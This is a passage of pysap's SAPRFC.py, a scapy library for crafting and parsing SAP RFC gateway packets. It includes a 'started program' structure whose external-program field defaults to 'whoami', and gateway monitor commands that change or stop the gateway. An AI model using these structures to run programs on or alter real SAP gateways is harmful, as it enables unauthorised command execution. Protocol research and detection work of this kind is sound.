SAPRFC.py
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# SECUREAUTH LABS. Copyright (C) 2019 SecureAuth Corporation. All rights reserved.
#
# The library was designed and developed by Martin Gallo from
# the SecureAuth Labs team.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# ==============
# External imports
from scapy.layers.inet import TCP
from scapy.packet import Packet, bind_layers
from scapy.fields import (ByteField, ConditionalField, IPField, IntField,
                          StrFixedLenField, SignedShortField, ShortField,
                          ByteEnumKeysField, IntEnumKeysField, SignedIntField,
                          FieldLenField, StrLenField, FlagsField, PacketField, StrField, PacketLenField, PacketListField)
# External imports
from scapy.layers.inet6 import IP6Field
from scapy.all import raw
# Custom imports
from pysap.SAPNI import SAPNI
from pysap.utils.fields import StrFixedLenPaddedField, IntToStrField, PacketNoPadded
# RFC Request Type values
# Maps the one-byte request type code to a display label.
rfc_req_type_values = {
    0x00: "GW_UNDEF_TYPE",
    0x01: "CHECK_GATEWAY",
    0x02: "GW_CONNECT_GWWP",
    0x03: "GW_NORMAL_CLIENT",
    0x04: "GW_REMOTE_GATEWAY",
    0x05: "STOP_GATEWAY",
    0x06: "GW_LOCAL_R3",
    0x07: "GW_SEND_INTERNAL_ERROR",  # Requires NiLocalCheck
    0x08: "GW_SEND_INFO",
    0x09: "GW_SEND_CMD",
    0x0a: "GW_WORKPROCESS_DIED",  # Requires NiLocalCheck
    0x0b: "GW_REGISTER_TP",
    0x0c: "GW_UNREGISTER_TP",
    0x0d: "GW_CONNECT_DISP",  # Requires NiLocalCheck
    0x0e: "GW_GET_NO_REGISTER_TP",
    0x0f: "GW_SAP_WP_CLIENT",  # Requires NiLocalCheck
    0x10: "GW_CANCEL_REGISTER_TP",
    0x11: "GW_FROM_REMOTE_GATEWAY",
    0x12: "GW_CONTAINER_RECEIVED",
}
# RFC function type values: code -> display label.
rfc_func_type_values = {
    0: "F_NO_REQUEST",
    1: "F_INITIALIZE_CONVERSATION",
    3: "F_ACCEPT_CONVERSATION",
    5: "F_ALLOCATE",
    7: "F_SEND_DATA",
    8: "F_ASEND_DATA",
    9: "F_RECEIVE",
    10: "F_ARECEIVE",
    11: "F_DEALLOCATE",
    13: "F_SET_TP_NAME",
    15: "F_SET_PARTNER_LU_NAME",
    17: "F_SET_SECURITY_PASSWORD",
    19: "F_SET_SECURITY_USER_ID",
    21: "F_SET_SECURITY_TYPE",
    23: "F_SET_CONVERSATION_TYPE",
    25: "F_EXTRACT_TP_NAME",
    27: "F_FLUSH",
    0xc9: "F_SAP_ALLOCATE",
    0xca: "F_SAP_INIT",
    0xcb: "F_SAP_SEND",
    0xcc: "F_ASAP_SEND",
    0xcd: "F_SAP_SYNC",
    0xce: "F_SAP_PING",
    0xcf: "F_SAP_REGTP",
    0xd0: "F_SAP_UNREGTP",
    0xd1: "F_SAP_ACCPTP",
    0xd2: "F_SAP_UNACCPTP",
    0xd3: "F_SAP_CANCTP",
    0xd4: "F_SAP_SET_UID",
    0xd5: "F_SAP_CANCEL",
    0xd6: "F_SAP_CANCELED",
    0xd7: "F_SAP_STOP_STREAMING",
    0xd8: "F_SAP_CONT_STREAMING",
}
# NOTE(review): the string statement below is worded for the request type
# table but sits directly after the function type table.
"""RFC Request Type values"""
# RFC Monitor Command values
# NOTE(review): judging by the names alone, several of these commands change
# gateway state rather than read it (e.g. CHANGE_PARAMETER, RELOAD_ACL,
# DELETE_CONN, SUICIDE). When this table is used to label captured traffic,
# those are the entries worth alerting on. Semantics are inferred from the
# labels, so confirm against SAP documentation.
rfc_monitor_cmd_values = {
    0x01: "NOOP",
    0x02: "DELETE_CONN",
    0x03: "CANCEL_CONN",
    0x04: "RST_SINGLE_ERR_CNT",
    0x05: "RST_ALL_ERR_CNT",
    0x06: "INCREASE_TRACE",
    0x07: "DECREASE_TRACE",
    0x08: "READ_SEC_INFO",
    0x09: "REFRESH_SEC_INFO",
    0x0a: "READ_GWSYS_TBL",
    0x0b: "READ_CONN_TBL",
    0x0c: "READ_PROC_TBL",
    0x0d: "READ_CONN_ATTR",
    0x0e: "READ_MEMORY",
    0x0f: "READ_REQ_BLK",
    0x10: "ACT_STATISTIC",
    0x11: "DEACT_STATISTIC",
    0x12: "READ_STATISTIC",
    0x13: "RESET_STATISTIC",
    0x14: "READ_PARAMETER",
    0x19: "DUMP_NIBUFFER",
    0x20: "RESET_NIBUFFER",
    0x21: "ACT_EXTPGM_TRACE",
    0x22: "DEACT_EXTPGM_TRACE",
    0x23: "ACT_CONN_TRACE",
    0x24: "DEACT_CONN_TRACE",
    0x25: "RESET_TRACE",
    0x26: "SUICIDE",
    0x27: "READ_SEC_INFO2",
    0x28: "CANCEL_REG_TP",
    0x29: "DUMP",
    0x2a: "READ_GWSYS_TBL2",
    0x2b: "CHANGE_PARAMETER",
    0x2c: "GET_CONN_PARTNER",
    0x2d: "DELETE_CLIENT",
    0x2e: "DELETE_REMGW",
    0x2f: "DISCONNECT",
    0x30: "ENABLE_RESTART",
    0x31: "DISABLE_RESTART",
    0x32: "NI_TRACE",
    0x33: "CLI_INFO",
    0x34: "GW_INFO",
    0x35: "CONVID_INFO",
    0x36: "GET_NO_REG_TP",
    0x37: "CV_INFO",
    0x38: "SO_KEEPALIVE",
    0x39: "READ_CONN_TBL2",
    0x40: "READ_GWSYS_TBL3",
    0x41: "RELOAD_ACL",
}
"""RFC Monitor Command values"""
# APPC protocol code -> label; only one protocol is mapped.
appc_protocol_values = {
    0x3: "CPIC",
}
# APPC return code -> label.
appc_rc_values = {
    0x0: "CM_OK",
    0x1: "CM_ALLOCATE_FAILURE_NO_RETRY",
    0x2: "CM_ALLOCATE_FAILURE_RETRY",
    0x3: "CM_CONVERSATION_TYPE_MISMATCH",
    0x5: "CM_PIP_NOT_SPECIFIED_CORRECTLY",
    0x6: "CM_SECURITY_NOT_VALID",
    0x7: "CM_SYNC_LVL_NOT_SUPPORTED_SYS",
    0x8: "CM_SYNC_LVL_NOT_SUPPORTED_PGM",
    0x9: "CM_TPN_NOT_RECOGNIZED",
    0xa: "CM_TP_NOT_AVAILABLE_NO_RETRY",
    0xb: "CM_TP_NOT_AVAILABLE_RETRY",
    0x11: "CM_DEALLOCATED_ABEND",
    0x12: "CM_DEALLOCATED_NORMAL",
    0x13: "CM_PARAMETER_ERROR",
    0x14: "CM_PRODUCT_SPECIFIC_ERROR",
    0x15: "CM_PROGRAM_ERROR_NO_TRUNC",
    0x16: "CM_PROGRAM_ERROR_PURGING",
    0x17: "CM_PROGRAM_ERROR_TRUNC",
    0x18: "CM_PROGRAM_PARAMETER_CHECK",
    0x19: "CM_PROGRAM_STATE_CHECK",
    0x1a: "CM_RESOURCE_FAILURE_NO_RETRY",
    0x1b: "CM_RESOURCE_FAILURE_RERTY",  # label spelled "RERTY" in the source; it is a runtime string, left unchanged
    0x1c: "CM_UNSUCCESSFUL",
    0x1e: "CM_DEALLOCATED_ABEND_SVC",
    0x1f: "CM_DEALLOCATED_ABEND_TIMER",
    0x20: "CM_SVC_ERROR_NO_TRUNC",
    0x21: "CM_SVC_ERROR_PURGING",
    0x22: "CM_SVC_ERROR_TRUNC",
    0x23: "CM_OPERATION_INCOMPLETE",
    0x24: "CM_SYSTEM_EVENT",
    0x25: "CM_OPERATION_NOT_ACCEPTED",
    0x26: "CM_CONVERSATION_ENDING",
    0x27: "CM_SEND_RCV_MODE_NOT_SUPPORTED",
    0x28: "CM_BUFFER_TOO_SMALL",
    0x29: "CM_EXP_DATA_NOT_SUPPORTED",
    0x2a: "CM_DEALLOC_CONFIRM_REJECT",
    0x2b: "CM_ALLOCATION_ERROR",
    0x2c: "CM_RETRY_LIMIT_EXCEEDED",
    0x2d: "CM_NO_SECONDARY_INFORMATION",
    0x2e: "CM_SECURITY_NOT_SUPPORTED",
    0x2f: "CM_SECURITY_MUTUAL_FAILED",
    0x30: "CM_CALL_NOT_SUPPORTED",
    0x31: "CM_PARM_VALUE_NOT_SUPPORTED",
    0x64: "CM_TAKE_BACKOUT",
    0x82: "CM_DEALLOCATED_ABEND_BO",
    0x83: "CM_DEALLOCATED_ABEND_SVC_BO",
    0x84: "CM_DEALLOCATED_ABEND_TIMER_BO",
    0x85: "CM_RESOURCE_FAIL_NO_RETRY_BO",
    0x86: "CM_RESOURCE_FAILURE_RETRY_BO",
    0x87: "CM_DEALLOCATED_NORMAL_BO",
    0x88: "CM_CONV_DEALLOC_AFTER_SYNCPT",
    0x89: "CM_INCLUDE_PARTNER_REJECT_BO",
    0x2711: "CM_SAP_TIMEOUT_RETRY",
    0x2712: "CM_CANCEL_REQUEST",
}
# Labels for SAPRFCEXTEND.ctype. The keys are the ASCII codes of
# 'C' (0x43), 'I' (0x49), 'E' (0x45) and 'R' (0x52).
cpic_ctypes = {
    0x43: "R_2",
    0x49: "R_3",
    0x45: "STARTED_PRG",
    0x52: "REGISTRED_PRG",
}
# RFC connection type code -> label. The keys are the ASCII codes of
# '2', '3', 'I', 'L', 'M', 'S', 'T' and 'X'.
rfc_rfc_types = {
    0x32: "R_2_CONN",
    0x33: "ABAP_CONN",
    0x49: "INTERNAL_CONN",
    0x4c: "LOGIC_CONN",
    0x4d: "CMC_CONN",
    0x53: "SNA_CPIC_CONN",
    0x54: "TCP_CONN",
    0x58: "ABAP_DRIVER_CONN",
}
# Empty placeholder: no SAP return codes are mapped here.
sap_rc_values = {
}
# Labels for SAPRFCDTStruct.start_type.
rfc_start_type = {
    0x0: 'DEFAULT',
    0x1: 'REMOTE_SHELL',
    0x2: 'REXEC',
    0x3: 'DISABLED',
    0x4: 'SECURE_SHELL',
}
# APPC Header versions length:
# 1: 4Ch
# 2/3: 64h
# 4: 8Ah
# 5: 4Eh
# 6: 50h
# Marker byte strings that delimit the CPIC fields. The ConditionalField
# lambdas in SAPCPIC / SAPCPIC2 compare the fixed-length "cpic_padd*" packet
# fields against these values to decide whether the following length/value
# pair is present. Most markers are 4 bytes; the two "cpic_some_params_*"
# entries are 2 bytes. In most entries the first two bytes repeat the last
# two bytes of the entry before it.
# NOTE(review): these are text literals. If the packet fields decode to bytes
# (as scapy does on Python 3), the equality tests would never match and every
# optional field would be skipped silently. Confirm which interpreter and
# scapy version this module targets.
cpic_padd = {
    "cpic_start_padd": "\x01\x01\x00\x08",
    "cpic_unk02_padd": "\x01\x01\x01\x01",
    "cpic_unk01_padd": "\x01\x01\x01\x03",
    "cpic_unk00_padd": "\x01\x03\x01\x06",
    "cpic_ip_padd": "\x01\x06\x00\x07",
    "cpic_ip_padd2": "\x00\x07\x00\x18",
    "cpic_host_sid_inbr_padd": "\x00\x18\x00\x08",
    "cpic_rfc_type_padd": "\x00\x08\x00\x11",
    "cpic_kernel1_padd": "\x00\x11\x00\x13",
    "cpic_kernel2_padd": "\x00\x13\x00\x12",
    "cpic_dest_padd": "\x00\x12\x00\x06",
    "cpic_program_padd": "\x00\x06\x01\x30",
    "cpic_username1_padd": "\x01\x30\x01\x11",
    "cpic_cli_nbr1_padd": "\x01\x11\x01\x14",
    "cpic_unk1_padd": "\x01\x14\x01\x15",
    "cpic_username2_padd": "\x01\x15\x00\x09",
    "cpic_cli_nbr2_padd": "\x00\x09\x01\x34",
    "cpic_unk2_padd": "\x01\x34\x05\x01",
    "cpic_some_params_0_padd": "\x05\x01",
    "cpic_some_params_1_padd": "\x01\x36",
    "cpic_convid_label_padd": "\x01\x36\x05\x02",
    "cpic_kernel3_padd": "\x05\x02\x00\x0b",
    "cpic_RFC_f_padd": "\x00\x0b\x01\x02",
    "cpic_unk4_padd": "\x01\x02\x05\x03",
    "cpic_th_struct_padd": "\x05\x03\x01\x31",
    "cpic_some_params2_padd": "\x01\x31\x05\x14",
    "cpic_unk6_padd": "\x05\x14\x04\x20",
    "cpic_unk7_padd": "\x04\x20\x05\x12",
    "cpic_suff_padd": "\x03\x02\x01\x04",
    "cpic_end_padd": "\x01\x04\xff\xff",
}
# 3-byte markers of the CPIC suffix block. SAPCPICSUFFIX hard-codes the same
# literals as field defaults; this dict is not referenced in the part of the
# file visible here. suff_padd14 and suff_padd15 carry the same value.
cpic_suff_padd = {
    "suff_padd1": "\x10\x04\x02",
    "suff_padd2": "\x10\x04\x0b",
    "suff_padd3": "\x10\x04\x04",
    "suff_padd4": "\x10\x04\x0d",
    "suff_padd5": "\x10\x04\x16",
    "suff_padd6": "\x10\x04\x17",
    "suff_padd7": "\x10\x04\x19",
    "suff_padd8": "\x10\x04\x1e",
    "suff_padd9": "\x10\x04\x25",
    "suff_padd10k": "\x10\x04\x09",
    "suff_padd10": "\x10\x04\x1d",
    "suff_padd11": "\x10\x04\x1f",
    "suff_padd12": "\x10\x04\x20",
    "suff_padd13": "\x10\x04\x21",
    "suff_padd14": "\x10\x04\x24",
    "suff_padd15": "\x10\x04\x24",
}
class SAPRFCEXTEND(PacketNoPadded):
    """SAP extend info block.

    Fixed layout: three 8-byte padded strings, a connection type byte
    (labels from cpic_ctypes, default 0x45 = STARTED_PRG), a client info
    byte, two padding bytes and two 16-bit indexes.
    """
    name = "SAP EXTEND INFO"
    fields_desc = [
        StrFixedLenPaddedField("short_dest_name", "", length=8),
        StrFixedLenPaddedField("ncpic_lu", "", length=8),
        StrFixedLenPaddedField("ncpic_tp", "", length=8),
        ByteEnumKeysField("ctype", 0x45, cpic_ctypes),
        ByteField("clientInfo", 0x01),
        StrFixedLenField("ncpic_parameters_padd", "\x00\x00", length=2),
        ShortField("comm_idx", 0x0),
        ShortField("conn_idx", 0x0),
    ]
class SAPRFCDTStruct(PacketNoPadded):
    """SAP RFC DT structure.
    This STRUCT is used to setup started program.

    All fields have a fixed size. start_type is labelled through
    rfc_start_type, and both timeouts default to -1.
    """
    name = "SAP RFC DT structure"
    fields_desc = [
        ByteField("version", 0x60),
        StrFixedLenField("padd1", "\x00" * 8, length=8),
        StrFixedLenField("root_id", "\x00" * 16, length=16),
        StrFixedLenField("conn_id", "\x00" * 16, length=16),
        IntField("conn_id_suff", 0),
        SignedIntField("timeout", -1),
        SignedIntField("keepalive_timeout", -1),
        ByteField("export_trace", 2),
        ByteEnumKeysField("start_type", 0x00, rfc_start_type),
        ByteField("net_protocol", 0x00),
        IP6Field("local_addrv6", "::1"),
        StrFixedLenPaddedField("long_lu", "", padd="\x00", length=128),
        StrFixedLenField("padd3", "\x00" * 16, length=16),
        StrFixedLenPaddedField("user", "", length=12),
        StrFixedLenField("padd4", "\x20" * 8, length=8),
        StrFixedLenField("padd5", "\x00" * 4, length=4),
        StrFixedLenField("padd6", "\x20" * 12, length=12),
        StrFixedLenField("padd7", "\x00" * 16, length=16),
        IPField("addr_ipv4", "0.0.0.0"),
        StrFixedLenField("padd8", "\x00" * 4, length=4),
        StrFixedLenPaddedField("long_tp", "", padd="\x00", length=64),
    ]
class SAPCPICSUFFIX(PacketNoPadded):
    """SAP CPIC SUFFIX

    A run of (3-byte marker, 2-byte big-endian length, value) triplets.
    The length fields default to None, so they are filled in from the
    value when a packet is built. When a packet is dissected, each
    length_from lambda uses the length read from the wire as-is; nothing
    in this class bounds or cross-checks it.
    """
    name = "SAP CPIC SUFFIX"
    fields_desc = [
        StrFixedLenField("suff_padd1", "\x10\x04\x02", length=3),
        FieldLenField("suff_unk1_len", None, length_of="suff_unk1", fmt="!H"),
        StrLenField("suff_unk1", "", length_from=lambda pkt: pkt.suff_unk1_len),
        StrFixedLenField("suff_padd2", "\x10\x04\x0b", length=3),
        FieldLenField("suff_unk2_len", None, length_of="suff_unk2", fmt="!H"),
        StrLenField("suff_unk2", "", length_from=lambda pkt: pkt.suff_unk2_len),
        StrFixedLenField("suff_padd3", "\x10\x04\x04", length=3),
        FieldLenField("suff_unk3_len", None, length_of="suff_unk3", fmt="!H"),
        StrLenField("suff_unk3", "", length_from=lambda pkt: pkt.suff_unk3_len),
        StrFixedLenField("suff_padd4", "\x10\x04\x0d", length=3),
        FieldLenField("suff_unk4_len", None, length_of="suff_unk4", fmt="!H"),
        StrLenField("suff_unk4", "", length_from=lambda pkt: pkt.suff_unk4_len),
        StrFixedLenField("suff_padd5", "\x10\x04\x16", length=3),
        FieldLenField("suff_unk5_len", None, length_of="suff_unk5", fmt="!H"),
        StrLenField("suff_unk5", "", length_from=lambda pkt: pkt.suff_unk5_len),
        StrFixedLenField("suff_padd6", "\x10\x04\x17", length=3),
        FieldLenField("suff_unk6_len", None, length_of="suff_unk6", fmt="!H"),
        StrLenField("suff_unk6", "", length_from=lambda pkt: pkt.suff_unk6_len),
        StrFixedLenField("suff_padd7", "\x10\x04\x19", length=3),
        FieldLenField("suff_unk7_len", None, length_of="suff_unk7", fmt="!H"),
        StrLenField("suff_unk7", "", length_from=lambda pkt: pkt.suff_unk7_len),
        StrFixedLenField("suff_padd8", "\x10\x04\x1e", length=3),
        FieldLenField("suff_unk8_len", None, length_of="suff_unk8", fmt="!H"),
        StrLenField("suff_unk8", "", length_from=lambda pkt: pkt.suff_unk8_len),
        StrFixedLenField("suff_padd9", "\x10\x04\x25", length=3),
        FieldLenField("suff_unk9_len", None, length_of="suff_unk9", fmt="!H"),
        StrLenField("suff_unk9", "", length_from=lambda pkt: pkt.suff_unk9_len),
        StrFixedLenField("suff_padd10k", "\x10\x04\x09", length=3),
        FieldLenField("suff_kernel_len", None, length_of="suff_kernel", fmt="!H"),
        StrLenField("suff_kernel", "720", length_from=lambda pkt: pkt.suff_kernel_len),
        # next fields exist only in win versions of clients suff_unk9 == "\x00\x01" (??)
        # All nine conditional fields below share the same predicate on suff_unk9.
        ConditionalField(StrFixedLenField("suff_padd10", "\x10\x04\x1d", length=3),lambda pkt: pkt.suff_unk9 == "\x00\x01"),
        ConditionalField(FieldLenField("suff_unk10_len", None, length_of="suff_unk10", fmt="!H"),lambda pkt: pkt.suff_unk9 == "\x00\x01"),
        ConditionalField(StrLenField("suff_unk10", "", length_from=lambda pkt: pkt.suff_unk10_len),lambda pkt: pkt.suff_unk9 == "\x00\x01"),
        ConditionalField(StrFixedLenField("suff_padd11", "\x10\x04\x1f", length=3),lambda pkt: pkt.suff_unk9 == "\x00\x01"),
        ConditionalField(FieldLenField("suff_cli1_len", None, length_of="suff_cli1", fmt="!H"),lambda pkt: pkt.suff_unk9 == "\x00\x01"),
        ConditionalField(StrLenField("suff_cli1", "", length_from=lambda pkt: pkt.suff_cli1_len),lambda pkt: pkt.suff_unk9 == "\x00\x01"),  # ip or OS name here
        ConditionalField(StrFixedLenField("suff_padd12", "\x10\x04\x20", length=3),lambda pkt: pkt.suff_unk9 == "\x00\x01"),
        ConditionalField(FieldLenField("suff_cli2_len", None, length_of="suff_cli2", fmt="!H"),lambda pkt: pkt.suff_unk9 == "\x00\x01"),
        ConditionalField(StrLenField("suff_cli2", "", length_from=lambda pkt: pkt.suff_cli2_len),lambda pkt: pkt.suff_unk9 == "\x00\x01"),  # browser name here
        ConditionalField(StrFixedLenField("suff_padd13", "\x10\x04\x21", length=3),lambda pkt: pkt.suff_unk9 == "\x00\x01"),
        ConditionalField(FieldLenField("suff_cli3_len", None, length_of="suff_cli3", fmt="!H"),lambda pkt: pkt.suff_unk9 == "\x00\x01"),
        ConditionalField(StrLenField("suff_cli3", "", length_from=lambda pkt: pkt.suff_cli3_len),lambda pkt: pkt.suff_unk9 == "\x00\x01"),  # office name here
        StrFixedLenField("suff_padd14", "\x10\x04\x24", length=3),
        FieldLenField("suff_unk14_len", None, length_of="suff_unk14", fmt="!H"),
        StrLenField("suff_unk14", "", length_from=lambda pkt: pkt.suff_unk14_len),
        # NOTE(review): same marker value as suff_padd14; confirm against a capture.
        StrFixedLenField("suff_padd15", "\x10\x04\x24", length=3),
        FieldLenField("suff_unk15_len", None, length_of="suff_unk15", fmt="!H"),
        StrLenField("suff_unk15", "", length_from=lambda pkt: pkt.suff_unk15_len),  # ip here
    ]
class SAPCPICPARAM(PacketNoPadded):
    """Fixed-size CPIC parameter record (37 bytes by the field lengths).

    Used as the element type of "some_cpic_params" in SAPCPIC / SAPCPIC2
    and of "th_some_cpic_params" in SAPRFCTHStruct.
    """
    name = "CPIC Prams1"  # ??? may be not params :)
    fields_desc = [
        StrFixedLenField("pref","\x01\x00\x0c\x29", length=4),
        StrFixedLenField("param1","", length=4),
        StrFixedLenField("param2","", length=11),
        StrFixedLenField("param_sess_1","", length=2),
        StrFixedLenField("param_sess_2","", length=4),
        # NOTE(review): both IPField defaults are the empty string, not an
        # address; confirm how a packet built with the defaults serialises.
        IPField("mask",""),
        IPField("ip",""),
        IntField("flag",1),
    ]
class SAPCPICPARAM2(PacketNoPadded):
    """Second fixed-size CPIC parameter record: 8 bytes plus two IPv4 fields.

    Used as the element type of "some_cpic_params2" in SAPCPIC2.
    """
    name = "CPIC Prams2"  # ??? may be not params :)
    fields_desc = [
        StrFixedLenField("param1","", length=8),
        IPField("mask",""),
        IPField("ip",""),
    ]
class SAPRFCTHStruct(PacketNoPadded):
    """SAP RFC TH structure.

    Framed by the "*TH*" eye-catcher at both ends.
    """
    name = "SAP RFC TH structure"
    fields_desc = [
        StrFixedLenField("th_eyec1", "*TH*", length=4),
        ByteField("th_version", 3),
        # Fixed default, not computed. 230 equals the summed size of the
        # fields of this class with exactly one SAPCPICPARAM entry.
        ShortField("th_len", 230),
        ShortField("th_trace_flag", None),
        StrFixedLenPaddedField("th_sysid", "", length=32),
        ShortField("th_serevice", 1),
        # The default user id is the literal "SAP*".
        # NOTE(review): SAP* is the name of SAP's built-in default account, so
        # this value in a captured TH structure may simply be this library's
        # default rather than a real logon; confirm against the sender.
        StrFixedLenPaddedField("th_userid", "SAP*", length=32),
        StrFixedLenPaddedField("th_action", "", length=40),
        StrFixedLenPaddedField("th_presysid", "", length=32),
        ShortField("th_acttype", 1),
        StrFixedLenPaddedField("th_id", "", length=35),
        ByteField("th_unused_comm1", 0,),
        # count_from always returns 1: exactly one parameter record is parsed.
        PacketListField("th_some_cpic_params", None, SAPCPICPARAM, count_from=lambda pkt: 1),
        StrFixedLenField("th_unused_comm2", "\x00\x00\x00\xe2", length=4),
        StrFixedLenField("th_eyec2", "*TH*", length=4),
    ]
class SAPRFXPG(PacketNoPadded):
    """SAP Started program packets.

    A run of (4-byte marker, 2-byte big-endian length, string) triplets that
    alternate between a label (default text such as "EXTPROG", "PARAMS") and
    the value for that label. SAPCPIC2 parses this structure when cpic_RFC_f
    equals 'SAPXPG_START_XPG_LONG'.

    Judging by the label strings, xpg_extprog_val carries the name of the
    external program and xpg_param_val / xpg_longparam_val its arguments,
    which makes these the fields to extract and log when reviewing captured
    start requests. Lengths are taken from the wire and not validated here.
    """
    name = "SAP Started program packets"
    fields_desc = [
        StrFixedLenField("xpg_padd100", "\x05\x12\x02\x05", length=4),
        FieldLenField("xpg_convid_l_len", None, length_of="xpg_convid_l", fmt="!H"),
        StrLenField("xpg_convid_l", "CONVID", length_from=lambda pkt: pkt.xpg_convid_l_len),
        StrFixedLenField("xpg_padd101", "\x02\x05\x02\x05", length=4),
        FieldLenField("xpg_strstat_l_len", None, length_of="xpg_strstat_l", fmt="!H"),
        StrLenField("xpg_strstat_l", "STRTSTAT", length_from=lambda pkt: pkt.xpg_strstat_l_len),
        StrFixedLenField("xpg_padd102", "\x02\x05\x02\x05", length=4),
        FieldLenField("xpg_xpgid_l_len", None, length_of="xpg_xpgid_l", fmt="!H"),
        StrLenField("xpg_xpgid_l", "XPGID", length_from=lambda pkt: pkt.xpg_xpgid_l_len),
        StrFixedLenField("xpg_padd103", "\x02\x05\x02\x01", length=4),
        FieldLenField("xpg_extprog_l_len", None, length_of="xpg_extprog_l", fmt="!H"),
        StrLenField("xpg_extprog_l", "EXTPROG", length_from=lambda pkt: pkt.xpg_extprog_l_len),
        StrFixedLenField("xpg_padd104", "\x02\x01\x02\x03", length=4),
        FieldLenField("xpg_extprog_val_len", None, length_of="xpg_extprog_val", fmt="!H"),
        # Value for the EXTPROG label. The default is the literal "whoami", so
        # a packet built without setting this field still names a program.
        StrLenField("xpg_extprog_val", "whoami", length_from=lambda pkt: pkt.xpg_extprog_val_len),
        StrFixedLenField("xpg_padd105", "\x02\x03\x02\x01", length=4),
        FieldLenField("xpg_longparam_l_len", None, length_of="xpg_longparam_l", fmt="!H"),
        StrLenField("xpg_longparam_l", "LONG_PARAMS", length_from=lambda pkt: pkt.xpg_longparam_l_len),
        StrFixedLenField("xpg_padd106", "\x02\x01\x02\x03", length=4),
        FieldLenField("xpg_longparam_val_len", None, length_of="xpg_longparam_val", fmt="!H"),
        StrLenField("xpg_longparam_val", "", length_from=lambda pkt: pkt.xpg_longparam_val_len),
        StrFixedLenField("xpg_padd107", "\x02\x03\x02\x01", length=4),
        FieldLenField("xpg_param_l_len", None, length_of="xpg_param_l", fmt="!H"),
        StrLenField("xpg_param_l", "PARAMS", length_from=lambda pkt: pkt.xpg_param_l_len),
        StrFixedLenField("xpg_padd108", "\x02\x01\x02\x03", length=4),
        FieldLenField("xpg_param_val_len", None, length_of="xpg_param_val", fmt="!H"),
        StrLenField("xpg_param_val", "", length_from=lambda pkt: pkt.xpg_param_val_len),
        StrFixedLenField("xpg_padd109", "\x02\x03\x02\x01", length=4),
        FieldLenField("xpg_stderrcntl_l_len", None, length_of="xpg_stderrcntl_l", fmt="!H"),
        StrLenField("xpg_stderrcntl_l", "STDERRCNTL", length_from=lambda pkt: pkt.xpg_stderrcntl_l_len),
        StrFixedLenField("xpg_padd110", "\x02\x01\x02\x03", length=4),
        FieldLenField("xpg_stderrcntl_val_len", None, length_of="xpg_stderrcntl_val", fmt="!H"),
        StrLenField("xpg_stderrcntl_val", "", length_from=lambda pkt: pkt.xpg_stderrcntl_val_len),
        StrFixedLenField("xpg_padd111", "\x02\x03\x02\x01", length=4),
        FieldLenField("xpg_stdincntl_l_len", None, length_of="xpg_stdincntl_l", fmt="!H"),
        StrLenField("xpg_stdincntl_l", "STDINCNTL", length_from=lambda pkt: pkt.xpg_stdincntl_l_len),
        StrFixedLenField("xpg_padd112", "\x02\x01\x02\x03", length=4),
        FieldLenField("xpg_stdincntl_val_len", None, length_of="xpg_stdincntl_val", fmt="!H"),
        # NOTE(review): the only *_val default in this class that is a label
        # word ("PARAMS") rather than empty; confirm it is intended.
        StrLenField("xpg_stdincntl_val", "PARAMS", length_from=lambda pkt: pkt.xpg_stdincntl_val_len),
        StrFixedLenField("xpg_padd113", "\x02\x03\x02\x01", length=4),
        FieldLenField("xpg_stdoutcntl_l_len", None, length_of="xpg_stdoutcntl_l", fmt="!H"),
        StrLenField("xpg_stdoutcntl_l", "STDOUTCNTL", length_from=lambda pkt: pkt.xpg_stdoutcntl_l_len),
        StrFixedLenField("xpg_padd114", "\x02\x01\x02\x03", length=4),
        FieldLenField("xpg_stdoutcntl_val_len", None, length_of="xpg_stdoutcntl_val", fmt="!H"),
        StrLenField("xpg_stdoutcntl_val", "", length_from=lambda pkt: pkt.xpg_stdoutcntl_val_len),
        StrFixedLenField("xpg_padd115", "\x02\x03\x02\x01", length=4),
        FieldLenField("xpg_termcntl_l_len", None, length_of="xpg_termcntl_l", fmt="!H"),
        StrLenField("xpg_termcntl_l", "TERMCNTL", length_from=lambda pkt: pkt.xpg_termcntl_l_len),
        StrFixedLenField("xpg_padd116", "\x02\x01\x02\x03", length=4),
        FieldLenField("xpg_termcntl_val_len", None, length_of="xpg_termcntl_val", fmt="!H"),
        StrLenField("xpg_termcntl_val", "", length_from=lambda pkt: pkt.xpg_termcntl_val_len),
        StrFixedLenField("xpg_padd117", "\x02\x03\x02\x01", length=4),
        FieldLenField("xpg_tracecntl_l_len", None, length_of="xpg_tracecntl_l", fmt="!H"),
        StrLenField("xpg_tracecntl_l", "TRACECNTL", length_from=lambda pkt: pkt.xpg_tracecntl_l_len),
        # NOTE(review): every other marker placed before a *_val field in this
        # class is "\x02\x01\x02\x03"; this one repeats the label marker.
        # Confirm against a capture.
        StrFixedLenField("xpg_padd118", "\x02\x03\x02\x01", length=4),
        FieldLenField("xpg_tracecntl_val_len", None, length_of="xpg_tracecntl_val", fmt="!H"),
        StrLenField("xpg_tracecntl_val", "", length_from=lambda pkt: pkt.xpg_tracecntl_val_len),
        StrFixedLenField("xpg_padd119", "\x02\x03\x03\x01", length=4),
        FieldLenField("xpg_log_l_len", None, length_of="xpg_log_l", fmt="!H"),
        StrLenField("xpg_log_l", "LOG", length_from=lambda pkt: pkt.xpg_log_l_len),
        StrFixedLenField("xpg_padd120", "\x03\x01\x03\x30", length=4),
        FieldLenField("xpg_log_val1_len", None, length_of="xpg_log_val1", fmt="!H"),
        StrLenField("xpg_log_val1", "", length_from=lambda pkt: pkt.xpg_log_val1_len),
        StrFixedLenField("xpg_padd121", "\x03\x30\x03\x02", length=4),
        FieldLenField("xpg_unk1_len", None, length_of="xpg_unk1", fmt="!H"),
        StrLenField("xpg_unk1", "", length_from=lambda pkt: pkt.xpg_unk1_len),
    ]
class DEF_FIELDS(PacketNoPadded):
    """Generic triplet: 4-byte marker, 2-byte big-endian length, value.

    Element type of SAPRFCPING.fields_test. No "name" attribute is set.
    """
    fields_desc = [
        StrFixedLenField("start_padd", "", length=4),
        FieldLenField("start_field1_len", None, length_of="start_field1", fmt="!H"),
        StrLenField("start_field1", "", length_from=lambda pkt: pkt.start_field1_len),
    ]
class SAPRFCPING(PacketNoPadded):
    """SAP Started program packets RFCPING.

    Parsed by SAPCPIC2 when cpic_RFC_f is 'RFC_PING'.
    """
    name = "SAP Started RFCPING packets"
    fields_desc = [
